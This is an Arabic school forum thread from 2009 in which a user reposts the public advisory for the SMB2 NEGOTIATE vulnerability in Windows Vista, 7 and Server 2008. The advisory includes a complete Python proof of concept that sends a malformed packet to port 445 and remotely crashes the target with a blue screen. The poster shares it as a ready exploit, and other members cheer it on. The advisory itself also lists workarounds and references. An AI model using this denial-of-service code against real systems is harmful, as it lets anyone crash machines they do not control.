منتدى قسم تكنولوجيا المعلومات في مدرسة الدوحة الثانوية المستقلة للبنين
علمت أن رزقي لن يأخذه غيري فاطمأن قلبي

قم وذق طعم الصلاة في دجى الليل الطويل

قم وجاهد في الحياة ان مثوانا قليل
منتدى قسم تكنولوجيا المعلومات في مدرسة الدوحة الثانوية المستقلة للبنين
علمت أن رزقي لن يأخذه غيري فاطمأن قلبي

قم وذق طعم الصلاة في دجى الليل الطويل

قم وجاهد في الحياة ان مثوانا قليل
منتدى قسم تكنولوجيا المعلومات في مدرسة الدوحة الثانوية المستقلة للبنين
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتدى قسم تكنولوجيا المعلومات في مدرسة الدوحة الثانوية المستقلة للبنين

من أفضل مدارس قطر
 
الرئيسيةأحدث الصورالتسجيلدخول
قال الامام احمد بن حنبل: إن لنا إخوان لانراهم إلا مره كل سنه , نحن اوثق بمودتهم ممن نراهم كل يوم .أسعد الله قلوبا طاهره إن وصلناها شكرت وإن قصرنا عذرت
من العظماء من يشعر المرء فى حضرته أنه صغير ولكن العظيم بحق هو من يشعر الجميع في حضرته بأنهم عظماء
كم في المقابر من يحسدونك على هذه الأيام والليالي التي تعيشها يتمنون لو تسبيحة أو استغفار ينفعهم عند ربهم أو سجدة تنير قبورهم أو صدقة تظلهم بين يدي الملك الجبار .. فقط تذكر .. ولا تضيع الفرصة التي بين يديك

 

 هههههههههههههه ثغرة SMB2 لوندوز فيستا و 7

اذهب الى الأسفل 
2 مشترك
كاتب الموضوعرسالة
crackerghost

crackerghost


Posts : 255
أهمية العضو : 2
Join date : 13/09/2009
Age : 31
Location : Where Hackerz and crackerz Live

هههههههههههههه ثغرة SMB2  لوندوز فيستا و 7 Empty
مُساهمةموضوع: هههههههههههههه ثغرة SMB2 لوندوز فيستا و 7   هههههههههههههه ثغرة SMB2  لوندوز فيستا و 7 Emptyالأربعاء ديسمبر 02, 2009 12:49 am

هههههههههههههه ثغرة SMB2  لوندوز فيستا و 7 2dh7d7c

قام أحد الباحثيين الأمنيين بنشر ثغرة جديدة تطال كل من ويندوز 7 ونظام ويندوز 2008 سيرفر فقط عبر مدونته والتي يبدو أنها مشكلة في برنامج SMB قد تتسبب في إنهيار النظام.

هذه المشكلة سبق أن ظهرت في كل من ويندوز 2003 وويندوز فيستا وإكس بي وقد تكون مايكروسوفت أغفلت تحديث هذه المشكلة مع تطوير ويندوز 7 ولكن مايكروسوفت أكدت في نفس الوقت أنه لم يتم الإبلاغ عن أي مشاكل أو هجمات تستفيد من هذه الثغرة بعد.

الباحث الأمني لم يمهل مايكروسوفت الوقت لمراجعة هذه الثغرة فقد قام بمراسلة مايكروسوفت في 8/نوفمبر قبل أن يقوم بنشر تفاصيل هذه الثغرة في تاريخ 11/نوفمبر أي بعدها بثلاثة أيام فقط.
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://http:\\bramjwolf.in-goo.com
crackerghost

crackerghost


Posts : 255
أهمية العضو : 2
Join date : 13/09/2009
Age : 31
Location : Where Hackerz and crackerz Live

هههههههههههههه ثغرة SMB2  لوندوز فيستا و 7 Empty
مُساهمةموضوع: رد: هههههههههههههه ثغرة SMB2 لوندوز فيستا و 7   هههههههههههههه ثغرة SMB2  لوندوز فيستا و 7 Emptyالأربعاء ديسمبر 02, 2009 12:50 am

هذه الثغرة مع الاستغلال ( لمختصين ميتا اكسبلوت)


=============================================
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=============================================

I. VULNERABILITY
-------------------------
Windows Vista, Server 2008 < R2, 7 RC :
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-------------------------
Windows vista and newer Windows comes with a new SMB version named SMB2.
See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DEscriptION
-------------------------
[Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS patch, for another SMB2.0 security issue:
KB942624 (MS07-063)
Installing only this specific update on Vista SP0 create the following issue:

SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for futher communication.

IV. PROOF OF CONCEPT
-------------------------

Smb-Bsod.py:

#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> Smile normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
-------------------------
An attacker can remotly crash any Vista/Windows 7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.

VI. SYSTEMS AFFECTED
-------------------------
[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 < R2, Windows 7 RC.

VII. SOLUTION
-------------------------
No patch available for the moment.
Close SMB feature and ports, until a patch is provided.
Configure your firewall properly
You can also follow the MS Workaround:
http://www.microsoft.com/technet/security/advisory/975497.mspx

VIII. REFERENCES
-------------------------
http://www.microsoft.com/technet/security/advisory/975497.mspx
http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-------------------------
Many persons have suggested to update this advisory for RCE and not BSOD:
It wont be done, if they find a way to execute code, they will publish them advisory.

# milw0rm.com [2009-09-09]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://http:\\bramjwolf.in-goo.com
Mu'menYassin

Mu'menYassin


Posts : 29
أهمية العضو : 0
Join date : 14/09/2009
Age : 31
Location : في جهازك

هههههههههههههه ثغرة SMB2  لوندوز فيستا و 7 Empty
مُساهمةموضوع: رد: هههههههههههههه ثغرة SMB2 لوندوز فيستا و 7   هههههههههههههه ثغرة SMB2  لوندوز فيستا و 7 Emptyالأربعاء ديسمبر 02, 2009 3:30 am

ألف ألف شكر حبيبي crackerghost

ثغرة روعة بس هلأ أستاذ أحمد بزعل قلبنا القسم للهكر خخخخخخخخخـــــــــــ×

مشكوور
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://www.al-asas.com
crackerghost

crackerghost


Posts : 255
أهمية العضو : 2
Join date : 13/09/2009
Age : 31
Location : Where Hackerz and crackerz Live

هههههههههههههه ثغرة SMB2  لوندوز فيستا و 7 Empty
مُساهمةموضوع: رد: هههههههههههههه ثغرة SMB2 لوندوز فيستا و 7   هههههههههههههه ثغرة SMB2  لوندوز فيستا و 7 Emptyالأربعاء ديسمبر 02, 2009 4:14 am

على راسي ، انت عند مين مداوم عند عند الصقور ولا العاصفة
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://http:\\bramjwolf.in-goo.com
Mu'menYassin

Mu'menYassin


Posts : 29
أهمية العضو : 0
Join date : 14/09/2009
Age : 31
Location : في جهازك

هههههههههههههه ثغرة SMB2  لوندوز فيستا و 7 Empty
مُساهمةموضوع: رد: هههههههههههههه ثغرة SMB2 لوندوز فيستا و 7   هههههههههههههه ثغرة SMB2  لوندوز فيستا و 7 Emptyالخميس ديسمبر 03, 2009 1:46 am

لا و الله يا غالي لا هاي وهاي بدك تعرف إسأل سعيد الحلواني صاحبك

خخخخخخخخخخخـــــــــــــــــــــ×
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://www.al-asas.com
 
هههههههههههههه ثغرة SMB2 لوندوز فيستا و 7
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» استغلال ثغرة 0-Day في Microsoft IIS 6.0
» Nokia PC suit ثغرة أمنية خطيرة في برنامج
» نظام ويندوز فيستا على شبكة الإنترنت
» ميكروسوفت تحصن النظام فيستا ضد السرقة
» ثغرة في ووردبريس 2.8.5 تمكّن المستخدمين من رفع ملفات php على السيرفر + كيفية الحماية منها

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدى قسم تكنولوجيا المعلومات في مدرسة الدوحة الثانوية المستقلة للبنين :: ----§§§§ المنتديات التقنية والبرمجية §§§§---- :: قسم الآمن والحماية-
انتقل الى: